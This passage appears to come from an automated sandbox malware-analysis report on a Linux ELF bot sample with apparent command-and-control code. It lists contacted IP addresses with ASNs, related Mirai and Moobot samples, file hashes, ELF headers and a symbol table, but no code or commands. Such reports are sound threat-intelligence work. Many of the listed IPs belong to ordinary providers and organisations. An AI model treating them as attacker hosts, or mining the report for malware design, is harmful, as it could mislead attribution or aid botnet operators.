              		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
              135.21.91.32
              		unknownUnited States
              		18676AVAYAUSfalse
              103.134.2.16
              		unknownPakistan
              		138590PRIMENETWORKS-AS-APPrimeNetworksPKfalse
              58.241.34.78
              		unknownChina
              		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
              198.75.131.137
              		unknownUnited States
              		35350AS_SCHWARZ_PHARMA_AGAlfred-Nobel-Str10DEfalse
              80.240.52.153
              		unknownRussian Federation
              		20895UGTELGrantingofservicesIntelligentNetworkRUfalse
              78.187.174.163
              		unknownTurkey
              		9121TTNETTRfalse
              126.4.136.141
              		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
              15.94.46.248
              		unknownUnited States
              		13979ATT-IPFRUSfalse
              2.149.52.168
              		unknownNorway
              		2119TELENOR-NEXTELTelenorNorgeASNOfalse
              66.27.241.94
              		unknownUnited States
              		20001TWC-20001-PACWESTUSfalse
              172.130.102.221
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              145.74.169.102
              		unknownNetherlands
              		1103SURFNET-NLSURFnetTheNetherlandsNLfalse
              98.88.180.28
              		unknownUnited States
              		11351TWC-11351-NORTHEASTUSfalse
              40.94.30.242
              		unknownUnited States
              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
              240.33.117.31
              		unknownReserved
              		unknownunknownfalse
              177.88.11.52
              		unknownBrazil
              		53237TELECOMUNICACOESBRASILEIRASSA-TELEBRASBRfalse
              5.11.234.117
              		unknownTurkey
              		16135TURKCELL-ASTurkcellASTRfalse
              164.10.121.175
              		unknownSweden
              		59807SWEDBANK-ASSEfalse
              157.202.45.78
              		unknownUnited States
              		1759TSF-IP-CORETeliaFinlandOyjEUfalse
              250.210.152.255
              		unknownReserved
              		unknownunknownfalse
              44.217.112.244
              		unknownUnited States
              		14618AMAZON-AESUSfalse
              16.203.130.156
              		unknownUnited States
              		unknownunknownfalse
              201.10.166.42
              		unknownBrazil
              		8167BrasilTelecomSA-FilialDistritoFederalBRfalse
              124.149.220.93
              		unknownAustralia
              		7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
              149.246.14.121
              		unknownGermany
              		38943KNORR-BREMSEDEfalse
              132.71.232.93
              		unknownIsrael
              		378MACHBA-ASILANILfalse
              114.152.26.172
              		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
              218.12.95.106
              		unknownChina
              		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
              192.222.244.189
              		unknownCanada
              		1403EBOXCAfalse
              67.94.108.221
              		unknownUnited States
              		2828XO-AS15USfalse
              123.137.119.5
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              34.51.194.220
              		unknownUnited States
              		2686ATGS-MMD-ASUSfalse
              86.241.117.50
              		unknownFrance
              		3215FranceTelecom-OrangeFRfalse
              15.28.3.157
              		unknownUnited States
              		13979ATT-IPFRUSfalse
              35.127.157.129
              		unknownUnited States
              		237MERIT-AS-14USfalse
              240.42.45.45
              		unknownReserved
              		unknownunknownfalse
              223.23.50.252
              		unknownTaiwan; Republic of China (ROC)
              		17709APTAsiaPacificTelecomTWfalse
              92.107.120.45
              		unknownSwitzerland
              		3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
              177.169.139.125
              		unknownBrazil
              		26599TELEFONICABRASILSABRfalse
              38.135.133.131
              		unknownUnited States
              		174COGENT-174USfalse
              186.142.10.44
              		unknownArgentina
              		11315TelefonicaMovilesArgentinaSAMovistarArgentinaARfalse
              107.23.208.50
              		unknownUnited States
              		14618AMAZON-AESUSfalse
              34.109.137.99
              		unknownUnited States
              		15169GOOGLEUSfalse
              40.49.193.164
              		unknownUnited States
              		4249LILLY-ASUSfalse
              158.38.100.82
              		unknownNorway
              		224UNINETTUNINETTTheNorwegianUniversityResearchNetworkfalse
              77.59.168.241
              		unknownSwitzerland
              		6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
              105.13.179.178
              		unknownSouth Africa
              		37168CELL-CZAfalse
              91.52.255.131
              		unknownGermany
              		3320DTAGInternetserviceprovideroperationsDEfalse
              141.184.60.198
              		unknownUnited States
              		197921HBTFJOfalse
              136.6.112.163
              		unknownUnited States
              		60311ONEFMCHfalse
              81.226.19.45
              		unknownSweden
              		3301TELIANET-SWEDENTeliaCompanySEfalse
              133.174.19.215
              		unknownJapan385AFCONC-BLOCK1-ASUSfalse
              248.109.165.49
              		unknownReserved
              		unknownunknownfalse
              250.235.187.1
              		unknownReserved
              		unknownunknownfalse
              91.219.136.124
              		unknownRussian Federation
              		51655ILIM-NETCZfalse
              98.211.71.29
              		unknownUnited States
              		7922COMCAST-7922USfalse
              137.31.249.97
              		unknownUnited States
              		26333UNONETUSfalse
              72.198.216.52
              		unknownUnited States
              		22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
              206.194.88.172
              		unknownUnited States
              		13990COUNTYOFORANGEUSfalse
              139.5.69.231
              		unknownNepal
              		17501WLINK-NEPAL-AS-APWorldLinkCommunicationsPvtLtdNPfalse
              75.249.6.1
              		unknownUnited States
              		22394CELLCOUSfalse
              42.212.76.26
              		unknownChina
              		4249LILLY-ASUSfalse
              138.104.38.244
              		unknownUnited Kingdom
              		4637ASN-TELSTRA-GLOBALTelstraGlobalHKfalse
              141.4.206.11
              		unknownGermany
              		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
              136.137.37.214
              		unknownUnited States
              		60311ONEFMCHfalse
              249.85.21.171
              		unknownReserved
              		unknownunknownfalse
              92.81.105.103
              		unknownRomania
              		9050RTDBucharestRomaniaROfalse
              12.154.157.33
              		unknownUnited States
              		36055MARKET-STRATEGIES-INTERNATIONALUSfalse
              118.149.194.104
              		unknownNew Zealand
              		38793NZCOMMS-AS-APTwoDegreesMobileLimitedNZfalse
              40.203.225.255
              		unknownUnited States
              		4249LILLY-ASUSfalse
              126.244.148.161
              		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
              198.161.156.7
              		unknownCanada
              		852ASN852CAfalse
              180.249.14.121
              		unknownIndonesia
              		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDfalse
              77.47.68.101
              		unknownGermany
              		35244KMS-DE_ASDEfalse
              50.216.212.39
              		unknownUnited States
              		7922COMCAST-7922USfalse
              1.158.217.99
              		unknownAustralia
              		1221ASN-TELSTRATelstraCorporationLtdAUfalse
              19.55.13.86
              		unknownUnited States
              		3MIT-GATEWAYSUSfalse
              183.161.8.146
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              85.52.103.170
              		unknownSpain
              		12479UNI2-ASESfalse
              36.35.201.189
              		unknownChina
              		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
              75.20.36.200
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              61.78.6.67
              		unknownKorea Republic of
              		55615DUZONBIZON-AS-KRDOUZONEBIZONKRfalse
              249.133.243.96
              		unknownReserved
              		unknownunknownfalse
              112.8.110.165
              		unknownChina
              		24444CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompanyfalse
              19.152.64.248
              		unknownUnited States
              		3MIT-GATEWAYSUSfalse
              209.108.235.151
              		unknownUnited States
              		7029WINDSTREAMUSfalse

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              daisy.ubuntu.comy74GaN6Ple.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              vSNDdQtqsQ.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.25
              WaLO5N346u.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              ov6scCPdf2.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              Gk0isyg63b.elfGet hashmaliciousGafgytBrowse
              • 162.213.35.25
              L3fKtz7HJ1.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              zm9kI6rODQ.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.25
              j0izti85pI.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              del6AYX1Fi.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              tjyWSi1w0M.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.25

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              GIGAINFRASoftbankBBCorpJP9wDlG5DeRK.elfGet hashmaliciousMoobotBrowse
              • 60.84.40.190
              mo68mtK9Ap.elfGet hashmaliciousMoobotBrowse
              • 219.52.2.252
              HOHD9C7W11.elfGet hashmaliciousMoobotBrowse
              • 60.89.95.106
              gIzj2ZdSYV.elfGet hashmaliciousMirai, MoobotBrowse
              • 126.228.167.150
              yjz3ZEaSau.elfGet hashmaliciousMoobotBrowse
              • 126.228.167.150
              bfpRfi6WQB.elfGet hashmaliciousMirai, MoobotBrowse
              • 218.121.105.25
              YMloXummt3.elfGet hashmaliciousMoobotBrowse
              • 61.206.23.156
              IjITuswg7J.elfGet hashmaliciousMirai, MoobotBrowse
              • 126.177.13.252
              bXqFYUkX.exeGet hashmaliciousUnknownBrowse
              • 218.139.253.1
              bot.x86-20240324-1846.elfGet hashmaliciousMirai, MoobotBrowse
              • 60.73.8.178
              ATT-INTERNET4US9wDlG5DeRK.elfGet hashmaliciousMoobotBrowse
              • 12.223.46.170
              LekwisnOvb.elfGet hashmaliciousMoobotBrowse
              • 162.205.135.43
              mo68mtK9Ap.elfGet hashmaliciousMoobotBrowse
              • 64.217.166.70
              HOHD9C7W11.elfGet hashmaliciousMoobotBrowse
              • 12.102.251.184
              gIzj2ZdSYV.elfGet hashmaliciousMirai, MoobotBrowse
              • 99.70.16.191
              yjz3ZEaSau.elfGet hashmaliciousMoobotBrowse
              • 99.70.16.191
              bfpRfi6WQB.elfGet hashmaliciousMirai, MoobotBrowse
              • 12.50.170.23
              YMloXummt3.elfGet hashmaliciousMoobotBrowse
              • 108.193.238.166
              http://shsh.caGet hashmaliciousUnknownBrowse
              • 172.183.192.109
              iMOyFZuS.exeGet hashmaliciousRemCom RemoteAdminBrowse
              • 76.250.115.15
              GFDLUSx9IUUeXyov.elfGet hashmaliciousMiraiBrowse
              • 140.208.91.9
              vQyQaHKU0U.elfGet hashmaliciousGafgytBrowse
              • 140.212.70.105
              sora.x86.elfGet hashmaliciousMiraiBrowse
              • 140.212.78.234
              1zc3Ea5F6H.elfGet hashmaliciousMiraiBrowse
              • 140.212.230.194
              1DQOxg7yQp.elfGet hashmaliciousMiraiBrowse
              • 140.208.22.177
              lkAU7FB3VY.elfGet hashmaliciousMiraiBrowse
              • 140.212.78.233
              GqM7ZJDz69.elfGet hashmaliciousUnknownBrowse
              • 140.208.22.100
              VlBtqs8BxH.elfGet hashmaliciousUnknownBrowse
              • 140.212.222.3
              4t5dine8c7.elfGet hashmaliciousMiraiBrowse
              • 140.212.78.224
              fSyUC0T3vq.elfGet hashmaliciousMiraiBrowse
              • 140.212.78.240
              ASN-TELSTRATelstraCorporationLtdAUHOHD9C7W11.elfGet hashmaliciousMoobotBrowse
              • 101.176.0.101
              gIzj2ZdSYV.elfGet hashmaliciousMirai, MoobotBrowse
              • 120.145.246.218
              yjz3ZEaSau.elfGet hashmaliciousMoobotBrowse
              • 120.145.246.218
              IjITuswg7J.elfGet hashmaliciousMirai, MoobotBrowse
              • 101.184.51.48
              h08xdwuTfW.elfGet hashmaliciousUnknownBrowse
              • 110.148.238.206
              BKO78694D5.elfGet hashmaliciousMirai, MoobotBrowse
              • 203.52.163.86
              nTDlOKAKOW.elfGet hashmaliciousUnknownBrowse
              • 58.175.243.120
              amVHi3Rope.elfGet hashmaliciousUnknownBrowse
              • 101.163.182.161
              Skz3Za2u6i.elfGet hashmaliciousMirai, MoobotBrowse
              • 120.147.70.202
              czKL48x7uW.elfGet hashmaliciousUnknownBrowse
              • 203.37.71.247
              EBONE1-PKEboneNetworkPVTLimitedPKTzYWkBAZFE.elfGet hashmaliciousMiraiBrowse
              • 119.152.118.25
              llsyz2PkG5.elfGet hashmaliciousUnknownBrowse
              • 103.49.139.157
              huhu.mpsl.elfGet hashmaliciousMiraiBrowse
              • 103.49.139.137
              IpxoWztsg2.elfGet hashmaliciousUnknownBrowse
              • 119.152.106.46
              3NlKDxmZwm.elfGet hashmaliciousUnknownBrowse
              • 119.152.118.28
              x86.elfGet hashmaliciousMiraiBrowse
              • 103.49.139.154
              BDo0QAk9Mu.elfGet hashmaliciousMiraiBrowse
              • 103.49.139.144
              arm.elfGet hashmaliciousMiraiBrowse
              • 119.152.118.18
              AbOIvblSAI.elfGet hashmaliciousMiraiBrowse
              • 103.49.139.154
              25hLREBiQT.elfGet hashmaliciousMiraiBrowse
              • 103.49.139.160

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
              Entropy (8bit):6.411555940078099
              TrID:
              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
              File name:rLMjh4RBTM.elf
              File size:89'720 bytes
              MD5:db952fa7284ef69e5529d888ffb2c0a4
              SHA1:7b42d0baeec869414ba0c6ecc5de06aacbfdf82e
              SHA256:94cc3f5128fd5ace72d047ce4966021737f5fc4e32034838a97fadf20a18585f
              SHA512:44539611c0cd62a7c5fcece2efbe17177a8e643eb424e936ee780ce11a47acc3f1d607c18d4ae9c0ca414df66451418cb113c34dd8dc26b10351ba894fd9b35e
              SSDEEP:1536:cuNxHCUSznV7T/Za+GLj7ZGdd9LEBPCTqJMoUa+XuMmal2a0vZp:ccHCfT/oLOnLwPCaMo0uMmM2aWZp
              TLSH:59937C86E3B2C973C4C30A7902DF9B311A31E8E31B5A8E06F36D9EF0AF16155705765A
              File Content Preview:.ELF........................4...........4. ...(.....................L...L....................p...p..`...TF...................v...v..................Q.td............................U..S.......c....h........[]...$.............U......=`}...t..5....Dv.....Dv.

              Static ELF Info

              ELF header

              Class:ELF32
              Data:2's complement, little endian
              Version:1 (current)
              Machine:Intel 80386
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x8048184
              Flags:0x0
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:4
              Section Header Offset:68116
              Section Header Size:40
              Number of Section Headers:19
              Header String Table Index:16

              Sections

              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x80480b40xb40x1c0x00x6AX001
              .textPROGBITS0x80480d00xd00xa2f70x00x6AX0016
              .finiPROGBITS0x80523c70xa3c70x170x00x6AX001
              .rodataPROGBITS0x80523e00xa3e00x4a6c0x00x2A0016
              .eh_framePROGBITS0x80570000xf0000x60c0x00x3WA004
              .tbssNOBITS0x805760c0xf60c0x80x00x403WAT004
              .ctorsPROGBITS0x805760c0xf60c0x80x00x3WA004
              .dtorsPROGBITS0x80576140xf6140x80x00x3WA004
              .jcrPROGBITS0x805761c0xf61c0x40x00x3WA004
              .got.pltPROGBITS0x80576200xf6200xc0x40x3WA004
              .dataPROGBITS0x80576400xf6400x7200x00x3WA0032
              .bssNOBITS0x8057d600xfd600x38f40x00x3WA0032
              .stabPROGBITS0x00xfd600xfc0xc0x01404
              .stabstrSTRTAB0x00xfe5c0xdb0x00x0001
              .commentPROGBITS0x00xff370xa560x00x0001
              .shstrtabSTRTAB0x00x1098d0x840x00x0001
              .symtabSYMTAB0x00x10d0c0x2e700x100x0182844
              .strtabSTRTAB0x00x13b7c0x22fc0x00x0001

              Program Segments

              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x80480000x80480000xee4c0xee4c6.66190x5R E0x1000.init .text .fini .rodata
              LOAD0xf0000x80570000x80570000xd600x46544.95960x6RW 0x1000.eh_frame .tbss .ctors .dtors .jcr .got.plt .data .bss
              TLS0xf60c0x805760c0x805760c0x00x80.00000x4R 0x4.tbss
              GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

              Symbols

              NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
              .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              .symtab0x80480b40SECTION<unknown>DEFAULT1
              .symtab0x80480d00SECTION<unknown>DEFAULT2
              .symtab0x80523c70SECTION<unknown>DEFAULT3
              .symtab0x80523e00SECTION<unknown>DEFAULT4
              .symtab0x80570000SECTION<unknown>DEFAULT5
              .symtab0x805760c0SECTION<unknown>DEFAULT6
              .symtab0x805760c0SECTION<unknown>DEFAULT7
              .symtab0x80576140SECTION<unknown>DEFAULT8
              .symtab0x805761c0SECTION<unknown>DEFAULT9
              .symtab0x80576200SECTION<unknown>DEFAULT10
              .symtab0x80576400SECTION<unknown>DEFAULT11
              .symtab0x8057d600SECTION<unknown>DEFAULT12
              .symtab0x00SECTION<unknown>DEFAULT13
              .symtab0x00SECTION<unknown>DEFAULT14
              .symtab0x00SECTION<unknown>DEFAULT15
              C.11.5136.symtab0x805573824OBJECT<unknown>DEFAULT4
              C2Sock.symtab0x805b2544OBJECT<unknown>DEFAULT12
              LOCAL_ADDR.symtab0x805abe44OBJECT<unknown>DEFAULT12
              POPBX1.symtab0x804f44f0NOTYPE<unknown>DEFAULT2
              POPBX1.symtab0x804f4af0NOTYPE<unknown>DEFAULT2
              POPBX1.symtab0x804f50f0NOTYPE<unknown>DEFAULT2
              PUSHBX1.symtab0x804f43b0NOTYPE<unknown>DEFAULT2
              PUSHBX1.symtab0x804f49b0NOTYPE<unknown>DEFAULT2
              PUSHBX1.symtab0x804f4fb0NOTYPE<unknown>DEFAULT2
              RESTBX1.symtab0x804f3f90NOTYPE<unknown>DEFAULT2
              SAVEBX1.symtab0x804f3ec0NOTYPE<unknown>DEFAULT2
              _Exit.symtab0x804c0c866FUNC<unknown>DEFAULT2
              _GLOBAL_OFFSET_TABLE_.symtab0x80576200OBJECT<unknown>HIDDEN10
              _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
              _L_lock_103.symtab0x805042616FUNC<unknown>DEFAULT2
              _L_lock_12.symtab0x80514b716FUNC<unknown>DEFAULT2
              _L_lock_140.symtab0x80514f716FUNC<unknown>DEFAULT2
              _L_lock_160.symtab0x805151716FUNC<unknown>DEFAULT2
              _L_lock_17.symtab0x80511a210FUNC<unknown>DEFAULT2
              _L_lock_18.symtab0x804c5a910FUNC<unknown>DEFAULT2
              _L_lock_18.symtab0x80503ec13FUNC<unknown>DEFAULT2
              _L_lock_191.symtab0x805153713FUNC<unknown>DEFAULT2
              _L_lock_198.symtab0x805078016FUNC<unknown>DEFAULT2
              _L_lock_209.symtab0x805079016FUNC<unknown>DEFAULT2
              _L_lock_29.symtab0x80514c716FUNC<unknown>DEFAULT2
              _L_lock_32.symtab0x805111510FUNC<unknown>DEFAULT2
              _L_lock_34.symtab0x805216613FUNC<unknown>DEFAULT2
              _L_lock_54.symtab0x80503f916FUNC<unknown>DEFAULT2
              _L_lock_70.symtab0x804f25c16FUNC<unknown>DEFAULT2
              _L_unlock_101.symtab0x805217310FUNC<unknown>DEFAULT2
              _L_unlock_102.symtab0x80514e716FUNC<unknown>DEFAULT2
              _L_unlock_113.symtab0x805043613FUNC<unknown>DEFAULT2
              _L_unlock_152.symtab0x805150716FUNC<unknown>DEFAULT2
              _L_unlock_167.symtab0x804f26c13FUNC<unknown>DEFAULT2
              _L_unlock_170.symtab0x805152716FUNC<unknown>DEFAULT2
              _L_unlock_225.symtab0x80507a013FUNC<unknown>DEFAULT2
              _L_unlock_232.symtab0x805154413FUNC<unknown>DEFAULT2
              _L_unlock_235.symtab0x80507ad13FUNC<unknown>DEFAULT2
              _L_unlock_40.symtab0x80511ac10FUNC<unknown>DEFAULT2
              _L_unlock_60.symtab0x804c5b310FUNC<unknown>DEFAULT2
              _L_unlock_61.symtab0x805111f10FUNC<unknown>DEFAULT2
              _L_unlock_66.symtab0x805040916FUNC<unknown>DEFAULT2
              _L_unlock_83.symtab0x805041913FUNC<unknown>DEFAULT2
              _L_unlock_86.symtab0x80514d716FUNC<unknown>DEFAULT2
              _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __CTOR_END__.symtab0x80576100OBJECT<unknown>DEFAULT7
              __CTOR_LIST__.symtab0x805760c0OBJECT<unknown>DEFAULT7
              __C_ctype_b.symtab0x8057d504OBJECT<unknown>DEFAULT11
              __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __C_ctype_b_data.symtab0x8056778768OBJECT<unknown>DEFAULT4
              __C_ctype_tolower.symtab0x8057d584OBJECT<unknown>DEFAULT11
              __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
              __C_ctype_tolower_data.symtab0x8056a78768OBJECT<unknown>DEFAULT4
              __DTOR_END__.symtab0x80576180OBJECT<unknown>DEFAULT8
              __DTOR_LIST__.symtab0x80576140OBJECT<unknown>DEFAULT8
              __EH_FRAME_BEGIN__.symtab0x80570000OBJECT<unknown>DEFAULT5
              __FRAME_END__.symtab0x80576080OBJECT<unknown>DEFAULT5
              __GI___C_ctype_b.symtab0x8057d504OBJECT<unknown>HIDDEN11
              __GI___C_ctype_tolower.symtab0x8057d584OBJECT<unknown>HIDDEN11
              __GI___close.symtab0x804f3e080FUNC<unknown>HIDDEN2
              __GI___close_nocancel.symtab0x804f3ea27FUNC<unknown>HIDDEN2
              __GI___ctype_b.symtab0x8057d544OBJECT<unknown>HIDDEN11
              __GI___ctype_tolower.symtab0x8057d5c4OBJECT<unknown>HIDDEN11
              __GI___errno_location.symtab0x804c4e813FUNC<unknown>HIDDEN2
              __GI___fcntl_nocancel.symtab0x804bfdc83FUNC<unknown>HIDDEN2
              __GI___fgetc_unlocked.symtab0x8051554204FUNC<unknown>HIDDEN2
              __GI___fputc_unlocked.symtab0x804d45c181FUNC<unknown>HIDDEN2
              __GI___glibc_strerror_r.symtab0x804d6c826FUNC<unknown>HIDDEN2
              __GI___libc_close.symtab0x804f3e080FUNC<unknown>HIDDEN2
              __GI___libc_fcntl.symtab0x804c02f153FUNC<unknown>HIDDEN2
              __GI___libc_open.symtab0x804f43091FUNC<unknown>HIDDEN2
              __GI___libc_read.symtab0x804f4f091FUNC<unknown>HIDDEN2
              __GI___libc_write.symtab0x804f49091FUNC<unknown>HIDDEN2
              __GI___open.symtab0x804f43091FUNC<unknown>HIDDEN2
              __GI___open_nocancel.symtab0x804f43a33FUNC<unknown>HIDDEN2
              __GI___read.symtab0x804f4f091FUNC<unknown>HIDDEN2
              __GI___read_nocancel.symtab0x804f4fa33FUNC<unknown>HIDDEN2
              __GI___uClibc_fini.symtab0x804f62356FUNC<unknown>HIDDEN2
              __GI___uClibc_init.symtab0x804f68739FUNC<unknown>HIDDEN2
              __GI___write.symtab0x804f49091FUNC<unknown>HIDDEN2
              __GI___write_nocancel.symtab0x804f49a33FUNC<unknown>HIDDEN2
              __GI___xpg_strerror_r.symtab0x804d6e4191FUNC<unknown>HIDDEN2
              __GI__exit.symtab0x804c0c866FUNC<unknown>HIDDEN2
              __GI_abort.symtab0x804e720191FUNC<unknown>HIDDEN2
              __GI_atoi.symtab0x804eb5017FUNC<unknown>HIDDEN2
              __GI_brk.symtab0x8051ed844FUNC<unknown>HIDDEN2
              __GI_close.symtab0x804f3e080FUNC<unknown>HIDDEN2
              __GI_closedir.symtab0x804c26c130FUNC<unknown>HIDDEN2
              __GI_config_close.symtab0x805013a44FUNC<unknown>HIDDEN2
              __GI_config_open.symtab0x805016644FUNC<unknown>HIDDEN2
              __GI_config_read.symtab0x804fed0618FUNC<unknown>HIDDEN2
              __GI_connect.symtab0x804d90c84FUNC<unknown>HIDDEN2
              __GI_exit.symtab0x804ec9493FUNC<unknown>HIDDEN2
              __GI_fclose.symtab0x8050270380FUNC<unknown>HIDDEN2
              __GI_fcntl.symtab0x804c02f153FUNC<unknown>HIDDEN2
              __GI_fflush_unlocked.symtab0x80512f8447FUNC<unknown>HIDDEN2
              __GI_fgetc.symtab0x8051084145FUNC<unknown>HIDDEN2
              __GI_fgetc_unlocked.symtab0x8051554204FUNC<unknown>HIDDEN2
              __GI_fgets.symtab0x805112c118FUNC<unknown>HIDDEN2
              __GI_fgets_unlocked.symtab0x805162094FUNC<unknown>HIDDEN2
              __GI_fopen.symtab0x805044421FUNC<unknown>HIDDEN2
              __GI_fork.symtab0x804f050524FUNC<unknown>HIDDEN2
              __GI_fputc_unlocked.symtab0x804d45c181FUNC<unknown>HIDDEN2
              __GI_fputs_unlocked.symtab0x804d51445FUNC<unknown>HIDDEN2
              __GI_fseek.symtab0x805205824FUNC<unknown>HIDDEN2
              __GI_fseeko64.symtab0x8052070246FUNC<unknown>HIDDEN2
              __GI_fstat.symtab0x804fa0470FUNC<unknown>HIDDEN2
              __GI_fwrite_unlocked.symtab0x804d544111FUNC<unknown>HIDDEN2
              __GI_getc_unlocked.symtab0x8051554204FUNC<unknown>HIDDEN2
              __GI_getdtablesize.symtab0x804fad032FUNC<unknown>HIDDEN2
              __GI_getegid.symtab0x804faf08FUNC<unknown>HIDDEN2
              __GI_geteuid.symtab0x804faf88FUNC<unknown>HIDDEN2
              __GI_getgid.symtab0x804fb008FUNC<unknown>HIDDEN2
              __GI_getpagesize.symtab0x804fb0819FUNC<unknown>HIDDEN2
              __GI_getpid.symtab0x804f27c49FUNC<unknown>HIDDEN2
              __GI_getrlimit.symtab0x804fb1c43FUNC<unknown>HIDDEN2
              __GI_getuid.symtab0x804c1148FUNC<unknown>HIDDEN2
              __GI_inet_addr.symtab0x804d8ec31FUNC<unknown>HIDDEN2
              __GI_inet_aton.symtab0x8051884148FUNC<unknown>HIDDEN2
              __GI_inet_ntoa.symtab0x804d8d817FUNC<unknown>HIDDEN2
              __GI_inet_ntoa_r.symtab0x804d88c76FUNC<unknown>HIDDEN2
              __GI_initstate_r.symtab0x804ea13155FUNC<unknown>HIDDEN2
              __GI_ioctl.symtab0x804fb48139FUNC<unknown>HIDDEN2
              __GI_isatty.symtab0x804d81027FUNC<unknown>HIDDEN2
              __GI_kill.symtab0x804c11c43FUNC<unknown>HIDDEN2
              __GI_lseek64.symtab0x805234490FUNC<unknown>HIDDEN2
              __GI_memcpy.symtab0x804d5b441FUNC<unknown>HIDDEN2
              __GI_memmove.symtab0x805168037FUNC<unknown>HIDDEN2
              __GI_mempcpy.symtab0x805232430FUNC<unknown>HIDDEN2
              __GI_memrchr.symtab0x8051700177FUNC<unknown>HIDDEN2
              __GI_memset.symtab0x804d5e050FUNC<unknown>HIDDEN2
              __GI_mmap.symtab0x804f98427FUNC<unknown>HIDDEN2
              __GI_mremap.symtab0x8051f0459FUNC<unknown>HIDDEN2
              __GI_munmap.symtab0x804fbd443FUNC<unknown>HIDDEN2
              __GI_nanosleep.symtab0x804fc2961FUNC<unknown>HIDDEN2
              __GI_open.symtab0x804f43091FUNC<unknown>HIDDEN2
              __GI_opendir.symtab0x804c378132FUNC<unknown>HIDDEN2
              __GI_putc_unlocked.symtab0x804d45c181FUNC<unknown>HIDDEN2
              __GI_raise.symtab0x804f2b0100FUNC<unknown>HIDDEN2
              __GI_random.symtab0x804e7e866FUNC<unknown>HIDDEN2
              __GI_random_r.symtab0x804e91495FUNC<unknown>HIDDEN2
              __GI_rawmemchr.symtab0x805231019FUNC<unknown>HIDDEN2
              __GI_read.symtab0x804f4f091FUNC<unknown>HIDDEN2
              __GI_readdir.symtab0x804c468127FUNC<unknown>HIDDEN2
              __GI_readdir64.symtab0x804fe4c129FUNC<unknown>HIDDEN2
              __GI_readlink.symtab0x804c18447FUNC<unknown>HIDDEN2
              __GI_recv.symtab0x804d99892FUNC<unknown>HIDDEN2
              __GI_sbrk.symtab0x804fc6864FUNC<unknown>HIDDEN2
              __GI_select.symtab0x804c1ed108FUNC<unknown>HIDDEN2
              __GI_send.symtab0x804d9f492FUNC<unknown>HIDDEN2
              __GI_setstate_r.symtab0x804eaae161FUNC<unknown>HIDDEN2
              __GI_sigaction.symtab0x804f90f80FUNC<unknown>HIDDEN2
              __GI_sigprocmask.symtab0x804fca897FUNC<unknown>HIDDEN2
              __GI_sleep.symtab0x804f314195FUNC<unknown>HIDDEN2
              __GI_socket.symtab0x804da5040FUNC<unknown>HIDDEN2
              __GI_sprintf.symtab0x804c5d830FUNC<unknown>HIDDEN2
              __GI_srandom_r.symtab0x804e973160FUNC<unknown>HIDDEN2
              __GI_strcasestr.symtab0x804d7a483FUNC<unknown>HIDDEN2
              __GI_strcat.symtab0x804d61435FUNC<unknown>HIDDEN2
              __GI_strchr.symtab0x80516a830FUNC<unknown>HIDDEN2
              __GI_strchrnul.symtab0x80516c825FUNC<unknown>HIDDEN2
              __GI_strcmp.symtab0x804d63829FUNC<unknown>HIDDEN2
              __GI_strcoll.symtab0x804d63829FUNC<unknown>HIDDEN2
              __GI_strcpy.symtab0x804d65827FUNC<unknown>HIDDEN2
              __GI_strcspn.symtab0x80517b445FUNC<unknown>HIDDEN2
              __GI_strlen.symtab0x804d67419FUNC<unknown>HIDDEN2
              __GI_strncmp.symtab0x804d68837FUNC<unknown>HIDDEN2
              __GI_strnlen.symtab0x804d6b024FUNC<unknown>HIDDEN2
              __GI_strpbrk.symtab0x805186035FUNC<unknown>HIDDEN2
              __GI_strrchr.symtab0x80516e426FUNC<unknown>HIDDEN2
